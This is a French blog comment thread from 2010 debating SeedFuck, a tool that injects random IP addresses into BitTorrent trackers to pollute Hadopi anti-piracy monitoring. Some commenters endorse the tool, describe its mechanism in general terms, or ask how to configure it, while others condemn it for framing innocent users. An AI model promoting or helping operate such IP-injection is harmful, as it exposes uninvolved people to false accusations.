Donc franchement, ceux qui sortent « ouais ils pensent que pour leur pomme, gnagnagna » … Ca se voit que t’as pas un gosse de 13 ans qui télécharge dans ton dos ( j’ai 20 ans, pas de gosses, mais moi je suis suffisamment ouvert d’esprit pour imaginer la scène).
Posté le 16 avril 2010 à 23:02:09
Ahnon!
Salut tous le monde !
Je suis littéralement dégouter par ce programme si dans l’éventualité je me fait choper !
Car je boss pour une association anti P2P et compagnie !
Donc si effectivement mon adresse IP est selectionner…
va y avoir un sacré bordel je ne vais pas me laisser faire !
Par contre pour essayer d’arranger ce programme perso je pense qu’ils auraient plutôt dît utiliser toutes les adresses IP des P2P man’s ! et générer au pif parmis ceux ou celles qui téléchargent déjà !
et non ceux qui n’on jamais pratiquer le P2P.
donc personnellement je pense qu’internet deviens de plus en plus crétins ! en peu comme c’est « asshole’s » qui cheat sur CS. bande de noobs ! (lol).
Posté le 16 avril 2010 à 23:09:12
Severe
@ Jemil
« …il se contentera de passer un coup de fil, tout s’arrangera miraculeusement, et personne n’en saura jamais rien… »
C’est grave ce que t’écris la…
Tu sous-entends que les citoyens ne sont pas égaux devant la loi? Que certains ont des passe-droits? Qu’il y’a du copinage? De l’obfuscation?
Posté le 16 avril 2010 à 23:12:27
adream
cerise, hadopi avait annoncer l installation d’un soft obligatoire sur le ou le spc de ta maison poru bloquer le téléchargement des fichier avec copyright, maintenant je sais pas si c’est encore d’actualité … a avoir
moi j’aimerai savoir LA DATE OFFICIEL de la sortie de hadopi, quelqu’un la connait?
Posté le 16 avril 2010 à 23:13:36
Tira
@adream
Personne la connaît… Pas même les gens qui bossent pour hadopi \o/
http://www.numerama.com/magazine/15379-hadopi-pourquoi-les-premiers-mails-ne-pourront-pas-partir-en-juin.html
Posté le 16 avril 2010 à 23:45:38
Ahnon!
mouais boff
Posté le 17 avril 2010 à 00:15:31
discordia
Hadopi ça fait bien longtemps que ça as été prouvé que le p2p à bien baisser, pour une augmentation beaucoup plus importante du DDL.
Je vois des gens se plaindre, le but de cette manœuvre, c’est pas d’envoyer des innocents en prison, c’est qu’Hadopi se retrouvent avec tellement de contestation, après réception de leur mail, que ça soit visible au yeux de tous que l’on peut pas juger quelqu’un coupable de quoi que ce soit avec son adresse ip.
Certains disent de balancer que des IP de personne travaillent pour le gouvernement ect….là, grosse erreur, les ajouter, oui, mais il faut aussi Que ça reste massif et aléatoire, que n’importe qui puissent être toucher, le but c’est de pouvoir contester en disant que n’importe qui à pu balancer sa propre ip, si le programme ne balance que des IP « gouvernementale » ça va se savoir et on fermeras les yeux sur cet argument.
Ensuite j’ai vu quelque commentaires qui disent, osef de hadopi, tant qu’on as le DDl on es en sécurité ect….
Alors oui hadopi c’est de la merde qui ne détecte même pas 10% du trafic français, mais c’est aussi un symbole, d’une part qu’on peut attaquer certains de nos liberté sous de faux prétexte, et d’autre part, qu’ils peuvent mettre en place des systèmes de surveillance et de blocage comme bon leur semble.
S’ajoute à ça qu’il faudra combien de temps pour qu’ils se jettent sur une nouvelle forme de surveillance spécial DDL?
Bref le but ici, c’est de rendre hadopi caduc, de montrer que leur projet de loi ne tient pas la route, et ainsi de décrédibilisé toutes leur prochaines tentative, en montrant qu’on les avait avertis que leur système ne marcherais pas, mais qu’il n’écoute pas, qu’il fonce tête baissé dans les pires âneries et que plus ils essaye de resserrer l’étau sur les téléchargements, plus les gens apprennent à contourner leur système, et donc à télécharger plus.
Posté le 17 avril 2010 à 00:21:08
lt8nk
Mouais, je trouve cette solution complètement conne. Car, en plus d’accuser un nombre de personnes totalement innocentes, cela va forcer les utilisateurs à installer les mouchards.
Avant seedfuck, je ne comptais absolument pas en installer un bah maintenant c’est l’inverse…
Posté le 17 avril 2010 à 00:33:35
Hogx
+1 Discordia.
En résumé, Ahnon et les autres, où étiez-vous quand cette loi liberticide est passée et pourquoi n’avoir pas défendu les droits de la défense avec la même abnégation que vous avez mis pour défendre les artistes et autres entreprises?
Maintenant que vous avez besoin de ces droits, vous râlez…
On a les lois qu’on mérite, et l’ironie de la situation n’est pas pour me déplaire.
J’espère de même au sujet de la suppression du juge d’instruction, afin que les impairs soient si nombreux pour qu’enfin l’ensemble des personnes réagissent.
Posté le 17 avril 2010 à 00:35:58
weedsky
c’est dommage pour celui qui passe par un vpn et se fait gauler parce que son ip a ete injectee
Posté le 17 avril 2010 à 03:02:14
W.Burnside
Seedfuck a quand même de nombreux problèmes :
1/Si trop de personne l’utilisent c’est le système même du P2P qui peut être sacrement congestionné.
2/Risque de faire accusé des innocents. Y compris des faux innocents (ceux qui téléchargent autrement) ne pourront eux non plus se défendre et ne pourront pas vraiment contester.
Je sais pas vous mais moi même les personnes n’ayant pas d’ordinateur ou de connexion Internet possèdent des fichiers not-copyright-friendly (gravés, sur lecteur MP3 ou sur DD externe). 20.000.000 de clients Internet en France surement très peu sont totalement cleen et donc combien oseront contester et aller jusqu’au bout.
3/si TMG joue le jeu du plus con il peuve très bien se contenter de chopper au hasard et donc sans preuve (rappel les décrets précisent les seules preuves à fournir pour être HADOPIsé sont une ip, un horaire, un titre, un logiciel de P2P; soit les même donnés « fourni » avec Seedfuck) juste pour forcer installation du spyware HADOPI chez un maximum de personnes.
4/Pourrir encore d’avantage l’image du Net et des Internautes et durcir les lois anti-Internet : « regardez ils hésitent même pas à faire accuser des innocents et donc pour aider les citoyens innocent du Net Français nous allons utiliser le karcher, avec le DPI vous ne pourrez plus être accusé à tort. »
Franchement je vois pas ce qu’on gagneraient à user de Seedfuck je trouve qu’il nous dessert sur tous les tableaux
Posté le 17 avril 2010 à 04:28:09
Philippe
Ah le spoofing … Et puis avec 169.254.x.x ils vont pas trouver grand monde …
Posté le 17 avril 2010 à 08:07:55
mops
http://www.degroupnews.com/actualite/n4701-troll-christine_albanel-ebook-numerisation-bibliotheque.html
Posté le 17 avril 2010 à 08:37:46
EaX
« Ça craint !! Mais ça va être le bordel, donc on va forcement bien rire… bah quoi ? »
Ah ouai c’est sûr, c’est trop drôle d’imaginer toutes les entreprises, orgnisations, administrations, étudiants ayant besoin d’internet etc, avoir des emmerdes alors qu’ils demandent rien à personne. Et tout ça parce qu’un mec dans son garage s’est cru plus malin que les gens qu’il critique.
Ceci dit, à part « on injecte l’IP dans le tracker, paf ça fait des chocapics », j’ai encore vu aucun article faisant la démonstration par A+B que ce code en C# basé sur WebClient (que n’importe qui peut coder) a vraiment un impact sur Hadopi en expliquant ses répercussions sur le protocole bitorrent et sur les couches réseau…
Posté le 17 avril 2010 à 09:31:39
odenis
C’etait pour cela qu’ils voulaient nous coller un soft chez l’utilisateur pour prouver son innocence…?
Posté le 17 avril 2010 à 10:21:29
Myst
Inutile, beaucoup de tracker n’utilisent pas l’IP présent dans l’URL mais directement celle de la connexion, car très souvent cette valeur est celle de l’IP LAN du PC (192.168…)
Bref…
Posté le 17 avril 2010 à 10:50:02
TheX
Vous n’avez rien rien compris !
Déjà, le titre de l’article :
* « Hadopi va couper l’accès internet de millier d’innocents ! »
- FAUX ! Cela serait abusé que sa tombe trois fois sur la même personne !
Ensuite, dans les commentaires :
* « C’est dégueulasse, ya des gens qui irons en prison pour rien »
- FAUX ! euh, je dois vraiment argumenter ?
Posté le 17 avril 2010 à 10:54:53
Jean-Peti
Ce que l’on oublie de dire , c’est que ça va niquer la qualité du réseau ! Paye ta merde si il y a des faux clients partout.
Posté le 17 avril 2010 à 12:19:18
NuDub
Par contre en plus du gros bordel que sa va générer, maintenant les mec ne flipperont plus de se faire chopper mais de ce faire avoir car leur IP as été générer alors qu’ils n’utilise même pas le p2p.
Ils auraient dus codé la génération d’IP des membres de gouvernement.
Posté le 17 avril 2010 à 12:58:55
polompom
l’internet de demain, vu par hadopi : http://www.hadopi.fr
Posté le 17 avril 2010 à 13:02:57
jojimoreau
On va rire jusqu’a quand ca nous arrivera dans la gueule xD
Posté le 17 avril 2010 à 13:04:44
NONO
Juste pour info, dans le code source le deuxième octet généré est sur la plage 10-100, or regardez votre adresse du routeur mais mon deuxième octet est > à 100 !
Sinon, il est toujours possible de mettre une exception (en insérant votre adresse ip) dans le code puis de le recompiler !
Posté le 17 avril 2010 à 14:29:36
pyscho
@Korben: Pourrais-tu te renseigner et expliquer à tout ce beau monde que SeedFuck ne va pas incriminer des innocents, que ça existe depuis longtemps et que le seul avantage à ce logiciel, c’est que les gens se détourneront de BitTorrent pour aller vers des méthodes de partage plus sécurisées…
Et par pitié, arrête les titres aguicheurs mais mensongers !
Posté le 17 avril 2010 à 14:37:37
eemm
Suis-je filtré???
Je n’arrive pas accéder à la page http://hack45.net/seedfuck-dechaine-le-net/
mais par le proxy http://www.websneak.co.uk/ ça marche.
Si d’autres personnes chez numéricable pouvait confirmer… ?
Posté le 17 avril 2010 à 15:02:37
seedur
Ouch, ça veut dire que la nouvelle menace sur le net sera :
- « fait attention garçon, j’ai ton IP, je la balance sur HADOPI si tu ne fais pas ce que je dis ou si tu m’embête ! »
Il ne faudra plus dire n’importe quoi, ne plus mettre de commentaire négatifs, etre gentil avec tout le monde,…
Hmmmm
Posté le 17 avril 2010 à 15:09:51
FOuni
@eemm: Chez NC également et j’accède à la page sans problème.
Posté le 17 avril 2010 à 15:50:48
Pink
@eemm:
ji arrive pas, jsuis chez free. bizarre :p
Posté le 17 avril 2010 à 16:19:31
BlackSmileFR
@eemm :
Je suis chez numéricable et effectivement leur site ne semble pas référencé (et pas forcément filtré, essaye de changer ton DNS par défaut !!)!!
@FOuni : bizarre, as tu modifié tes DNS ?
Posté le 17 avril 2010 à 16:43:01
Jean-Peti
Pour ceux qui comprennent pas , c’est le retour du filtrage chez free…
Posté le 17 avril 2010 à 16:45:58
FOuni
@BlackSmileFR: Non pourtant j’ai leurs vieux DNS pourraves : 89.2.0.1 89.2.0.2
Posté le 17 avril 2010 à 17:22:10
MrDoy
@eemm: Chez Free, rien, pas de requête HTTP, mais le PING passe et le traceroute semble s’arrêter à une requête DNS (via Google) et est clean via Free… Par contre, par Orange et proxy ça marche.
Ça vient pas des DNS (tenté avec Google).
Ce serait étonnant que Free ne puisse pas y accéder. Peut-être un filtrage du site envers les freenautes ? Ou un simple petit défaut de routage… C’est à Panama le site…
Il est probable que Level3 et les autres aient pas de bonnes tables de routage. Orange utilise OpenTransit, peut-être que c’est mieux peeré…
@Jean-Peti: LOL
Posté le 17 avril 2010 à 17:22:51
pb2010
La Hadopi se base sur le téléchargement d’un chunk depuis une adresse IP pour prendre une mesure d’avertissement ou de déconnexion. Donc cet outil ne changera absolument rien à la procédure de détection, si ce n’est qu’il va peut-être allonger de quelques millisecondes l’initialisation d’un téléchargement depuis chez un méchant piratin.
Posté le 17 avril 2010 à 17:23:01
FOuni
@Jean-Peti: huh ? Source ?
Posté le 17 avril 2010 à 17:26:10
Hebus
Déjà au début d’HADOPI, on parlait de 30% de faux-positifs (IP existant mais injectés via des logiciels comme ça, entendu sur podradio).
Depuis P2P via VPN et streaming, plus augmentation de ces IP aléatoires bientôt la probabilité de se faire chopper en étant un pirate imprudent sera aussi grand que celle de se faire chopper que en étant un non-pirate, ou un pirate prudent.
Mais bon… avant que ceux qui soutiennent HADOPI se rendent compte de se genre de problèmes, beaucoup de tête d’innocents vont tomber.
Posté le 17 avril 2010 à 18:24:59
Hakri
Hebus > KEUWAH ?!
Y en a qui soutiennent HADOPI ?! oO’
Posté le 17 avril 2010 à 18:39:48
Suvann
Je doute que ce genre de soft, même avec une utilisation généralisé, ne fasse changer d’avis nos gouvernants.
Posté le 17 avril 2010 à 18:46:31
Suvann
@eemm:
Pareil que toi, chez NC, je ne peux accéder à la page que via le proxy.
Posté le 17 avril 2010 à 18:49:09
krg
eu honnetement, je ne trouve pas cela intelligent, au pire fallait injecter uniquement les ip de major, ou du gouv.
Je doit vous rappelez que le gouv se tape totalement ce que vous pensez, il reviendra surment pas en arriere,q uand il vera plein de gens arreter, il va ce servir de cela pour montrer au gens que leur Hadopi marche bien.
Allez expliquer au peuple qui ne sais pas ce servir d’une souris, que NOUS avons injecter leur IP pour qu’il ce fasse piner et que le gouv change…
Posté le 17 avril 2010 à 19:07:53
Trust
Je suis chez Free et j’ accède au site avec et sans vpn
donc pas de filtrage chez free
Posté le 17 avril 2010 à 19:27:00
eemm
Bizarre tout ça…
@BlackSmileFR: J’ai essayé de changer les DNS, j’ai mis ceux d’OPENDNS mais rien n’y fait, on va attendre…
Posté le 17 avril 2010 à 19:41:51
TDM
Ca passe ou ca casse ce genre de truc ! Faut que ca soit massif pour que cela marche, sinon y’aura jusque quelques péons qui l’auront profond pour rien…
Posté le 17 avril 2010 à 21:00:43
Dasoft
Il y a un truc qu’il faudrait m’expliquer : pourquoi les clients torrents affichents les adresses ip des seeders, pas besoin de les marquer à l’écran, ils pouraient les stocker en mémoire, les crypter, enfin je demande à comprendre…
Posté le 17 avril 2010 à 21:40:50
Myst
Bref, ce code et cette news sont inutiles, commencez à voir comment fonctionne bittorrent avant de faire des billets comme ça.
C’est comme l’histoire des « Meuporg », on parle alors que l’on connait pas…
Posté le 17 avril 2010 à 23:07:39
Myst
@ Dasoft:
Dans tous les cas, ils est extrémement facile de récupérer les IPs provenant d’un tracker sur un torrent précis, alors pourquoi les crypter à l’écran…
Posté le 17 avril 2010 à 23:20:04
Toowik
Si sa marche VIVE SEEDFUCK !!
Posté le 17 avril 2010 à 23:40:27
Hackira
Korben, arrête moi si je me trompe mais ils envoient des courriers avant et la liste est renouvellée tout les 6 mois, au final sa reviens au même, sa fait encore plus de travail pour HADOPI qui devra trier entre les vrai warez et les pauvres innocents
Posté le 18 avril 2010 à 11:21:15
halford
Seedfuck va mettre le boxon… atroce.
Posté le 18 avril 2010 à 15:59:52
echantillon gratuit
merci pour l’info . on va pas être dans la cyber Spatio Mer…
Posté le 18 avril 2010 à 22:39:28
TeT
Hackira : « sa fait encore plus de travail pour HADOPI qui devra trier entre les vrai warez et les pauvres innocents »
Mais justement. C’est tout l’intérêt de la chose.
Si ils ont TROP de travail et qu’en plus ils se rendent compte que leur travail ne sert à rien bien souvent… Peut-être qu’il y aura une nouvelle réflexion sur le sujet.
Ou bien ils vont simplement devenir encore plus intrusif avec leur spyware à la con.
Posté le 18 avril 2010 à 23:37:56
Deux petites news de la fin de cette semaine from Korben.info « Blog de Unknow
[...] Deuxième chose: le code C# d’un programme pour injecter des IP “bidon” dans les réseaux P2P rendu publique. (source) [...]
Posté le 19 avril 2010 à 00:28:19
Gourmet
« On va faire du téléchargement avec SeedFuck en indiquant les adresses IP du Ministère et de l’Hadopi ! Ils pourront se couper leur propres connexions. »
Avec la plupart des client BT c’est déjà possible. Comme kTorrent.
db
Posté le 19 avril 2010 à 10:15:25
gny
@korben, une petite précision qui à son importance, polluer les réseaux P2P avec des adresse IP est passible de l’article 434-23 du CP (usurpation d’identité).
Posté le 19 avril 2010 à 11:10:24
FOuni
@gny:
« Le fait de prendre le nom d’un tiers, dans des circonstances qui ont déterminé ou auraient pu déterminer contre celui-ci des poursuites pénales, est puni de cinq ans d’emprisonnement et de 75000 euros d’amende. »
l’IP, un nom ? « sauce or did not happen »
Posté le 19 avril 2010 à 12:23:59
Tea-bo
Nan mais ça me désole de voir l’imbécilité de notre gouvernement bon à rien, oui je le dit au et fort, j’assume, le gouvernement Français c’est de la merde ! Avec toute ces lois qui servent à rien à part compliquer la vie des honnêtes gens. Les personnes visées par ces lois s’en moquent totalement à tel point il est facile contourner Hadopi.
Posté le 19 avril 2010 à 12:54:36
FOuni
@Tea-bo: Une fois que la grande majorité des gens auront été effrayé, l’ »Etat », ou les majors comme on veut, auront atteint leur but à savoir enrayer la démocratisation du piratage, ce que l’on peut comprendre.
Posté le 19 avril 2010 à 14:47:07
Efre
@PinKponK: Y’a prescription pour Bernard Menez, c’est de la culture fondamentale.
Posté le 19 avril 2010 à 23:57:47
http://www.ficgs.com/blog/lol
Et alors Hadopi ça va donner quoi avec les fichiers Megaupload etc ?? Seedfuck peut aussi faire quelque chose là dessus ?
Posté le 21 avril 2010 à 22:41:43
Hadopi : la guerre est ouverte et on risque de bien se marrer « Donjipez Words
[...] petit soft est apparu et semble se répandre comme une trainée de poudre. Son nom : Seedfuck. Joli non ? Activité : balancer sur les réseaux p2p et Bittorrent plus particulièrement, des [...]
Posté le 22 avril 2010 à 15:43:22
421
J’arrives pas à le configurer, j’ai pris un torrent sur piratebay, reporté son hash, l’url de l’annonce de piratebay et j’ai « erreur d’accès à l’url ».
http://i.imgur.com/vjpV3.png
Quelqu’un aurait il un tuto ? ^^
J’ai utilisé la version java.
Posté le 22 avril 2010 à 20:24:49
Tech #33 – Gérez votre vie privée, boudiou ! | Frenchspin.com (fr)
[...] – Apple perd son iPhone 4G Seedfuck Slashdot – Une boutique en ligne a légalement acquis l’âme de ses clients. Google [...]
Posté le 27 avril 2010 à 15:42:36
SeedFuck… oui..? non! « MagicalTux in Japan
[...] SeedFuck, Hadopi est fini”. Je tiens a préciser que non! Ça m’énerve de voir tout un tas de sources s’extasier devant du [...]
Posté le 29 avril 2010 à 07:41:58
Bluebear - l'arme anti p2p
[...] Télévision dans la ligne de mire des hackersUne nouveauté impressionnante de Photoshop CS5SeedFuck – Hadopi va couper la connexion internet de milliers d’innocentsProgéniture de péripatéticienneVous devrez être connecté en permanence pour jouer à Command [...]
Posté le 29 avril 2010 à 15:12:02
BLUEBEAR- utilisateurs de Bittorent attention!!! « Le Blog de Dockydoc1959
[...] partagé sa science du réseau Bittorrent avec nous tous. Vous pouvez oublier le suicide au Seedfuck et commencer à prier bande de vilains tipiak )) (ou alors passer à des moyens de téléchargement [...]
Posté le 30 avril 2010 à 23:15:47
Injection d’adresses IP aléatoires sur les réseaux P2P : SeedFuck
[...] Source : Korben [...]
Posté le 2 mai 2010 à 12:05:19
SEEDFUCK… BEAUCOUP DE BRUIT ET DE PHANTASMES, DE PART ET D’AUTRE « Libertes &
[...] réactions diverses sur Numerama, PC-Inpact, Clubic, Zataz, 01Net ou les blogs de bluetouff et de Korben …Souvent, les Buzz portent sur des informations simples et non techniques, comme la vie sexuelle [...]
Posté le 3 mai 2010 à 13:52:53
Condamnée pour avoir laissé sa connexion Wifi accessible | Mistipi
[...] Sachez que même si vous avez sécurisé votre connexion Wifi, votre IP pourrait être retrouvée sur un site de téléchargement Torrent, car certain de ces sites menacent d’utiliser un code appelé SeedFuck qui générerons de fausses adresses IP de connexion ( qui pourrait être la votre ) afin de noyer la surveillance d’Hadopi dans des procédures judiciares avec des innocents. Voir explication sur le site de l’excellent Korben. [...]
Posté le 13 mai 2010 à 20:54:15
Matthieu M.
Ca me fait doucement sourire et peur cette idée.
Oui c’est vrai c’est amusant à lire, par contre si on réfléchit, c’est clairement lamentable.
Vous allez foutre des innocents dans la merde, rien que pour jouer avec le gouvernement. Remarque vous, vous vous en foutez vous ne serez pas dans le lot grace à vos masquages d’ip divers et variés.
C’est pour la bonne cause!!! Laquelle? la votre? et le quidam qui va se faire chopper il la partage cette cause?
Faut des sacrifiés! Ben oui bien sur mais surtout pas vous hein, non le gars qui n’a rien à voir dans l’histoire c’est plus pratique. C’est tellement mieux de sacrifier les autres. Les généraux français de 14-18 avec les tirailleurs coloniaux l’avaient bien compris, les terroristes l’ont toujours appliqué…
L’Homme ne changera jamais. Celui la meme qui crie se battre pour hadopi pour la liberté n’hésitera jamais à foutre en l’air son voisin s’il le peut, du moment que LUI en sortira indemne.
Vous savez quoi? Vous me débectez, encore plus qu’hadopi, et à ceux qui défendent une telle réponse, je ne leur souhaite qu’une chose : qu’ils se fassent chopper et n’arrivent pas à prouver leur innocence.
Hadopi c’est de la connerie monumentale, mais cette réponse l’est tout autant.
La réponse, bien plus subtile c’est le vpn, les transmissions cryptées, les autres moyens de téléchargement… Au moins vous ne faites pas chier les autres qui n’ont rien demandé, et ils en attraperont tellement peu qu’ils se rendront compte de l’inefficacité de leurs mesure.
Laissez les patauger dans leur loi inutile, ils se rendront compte qu’elle est complêtement à côté de la plaque.
Ils surveillent les nationales, nous on prend déjà l’autoroute…
A bon entendeur.
Posté le 30 mai 2010 à 11:23:02
Faut-il avoir peur d’HADOPI? « Journal du Hack
[...] final? Avec le PoC (Proof of Concept) SeedFuck, il ont tous quasi la même probabilité de voir leur IP collecté par TMG: cette société privé [...]
Posté le 8 juin 2010 à 23:53:26
Allez, venez ! On va se moquer encore un peu…
[...] IP est loin d’être une preuve suffisante (crack de réseau wifi, ou fake avec seedfuck), comment allez vous faire pour vous protéger de cette punition aveugle qui va s’abattre sur [...]
Posté le 11 juin 2010 à 15:28:36
Phantom
N’importe quoi ! Une adresse unique est très facile à collecter et le « brouillage » par seedfuck ou IPfuck! ne change rien sinon que se sont des « POC » par rapport à des requêtes HTTP mais essayez de télécharger deux fichiers sur RapidShare par exemple : impossible car votre adresse IP réelle est collectée! C’est pas compliqué et autant dire que votre provider a encore moins de mal à faire le tri…
Sinon je vous recommande cette très intéressante lecture pointée dans un autre article : http://hal.inria.fr/docs/00/47/03/24/PDF/bt_privacy_LEET10.pdf
PS : Comme disait Coluche « J’ai les noms… oops les IP …des meneurs »
Posté le 16 juin 2010 à 12:03:34